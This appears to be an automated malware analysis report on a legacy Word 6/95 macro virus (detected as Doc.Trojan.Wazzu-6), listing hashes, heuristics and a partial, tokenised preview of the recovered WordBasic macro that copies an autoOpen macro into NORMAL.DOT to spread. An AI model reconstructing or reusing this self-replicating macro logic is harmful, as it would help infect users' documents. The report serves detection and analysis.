Office (OLE) malware analysis — malicious · dc718e69cff8c1f9

MALICIOUS

Office (OLE)

6.0 KB First seen: 2012-06-14

MD5: bb62b70f290c816fb3ae2d22ea4651a3 SHA-1: a6fdb15a7b72752f2e28564e1d990cbdc5de392f SHA-256: dc718e69cff8c1f96c1209ca186f1904811261ac81595b5a2534ff40da83112a

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers, specifically 'RSN MACRO VIRUS', and contains embedded text that repeats this marker and references 'Goat file'. This strongly indicates a malicious document intended for propagation, likely through macro execution. No specific payload or network activity was directly observed in the provided evidence.

Heuristics 3

ClamAV: Doc.Trojan.Wazzu-6 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Wazzu-6
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE

The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 342 bytes

Filename	Kind	Source	Size
`wordbasic_macros.txt`	wordbasic-macro	analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)	342 bytes
SHA-256: `60267a54428f661469c7e613ba0801d93caaefea8200e44e1f04e48af618577b`
Preview script First 1,000 lines of the extracted script MAIN @cmd8178 "pmi.dot" , 1 , - * errCaught @cmd0056 dlg @cmd0056 dlg fileMacro$ = dlg = "\" = dlg @cmd0700 ":autoOpen" globMacro$ = "Global:autoOpen" MacroFile$ = @cmd80af @cmd8009 @cmd818e @cmd80b8 0 , 10 MacroFile$ = "NORMAL.DOT" @cmd80c2 globMacro$ , fileMacro$ @cmd0054 = 1 @cmd80c2 fileMacro$ , globMacro$ Payload * bye @cmd7468 , - * 0

SHA-256: 60267a54428f661469c7e613ba0801d93caaefea8200e44e1f04e48af618577b

Preview script

First 1,000 lines of the extracted script

MAIN
@cmd8178 "pmi.dot" , 1
, - * errCaught
@cmd0056
dlg @cmd0056
dlg
fileMacro$ = dlg = "\" = dlg @cmd0700 ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = @cmd80af @cmd8009 @cmd818e @cmd80b8 0 , 10
MacroFile$ = "NORMAL.DOT"
@cmd80c2 globMacro$ , fileMacro$
@cmd0054 = 1
@cmd80c2 fileMacro$ , globMacro$
Payload
* bye @cmd7468
, - * 0

Open this report in the interactive analyzer, or submit your own file for analysis.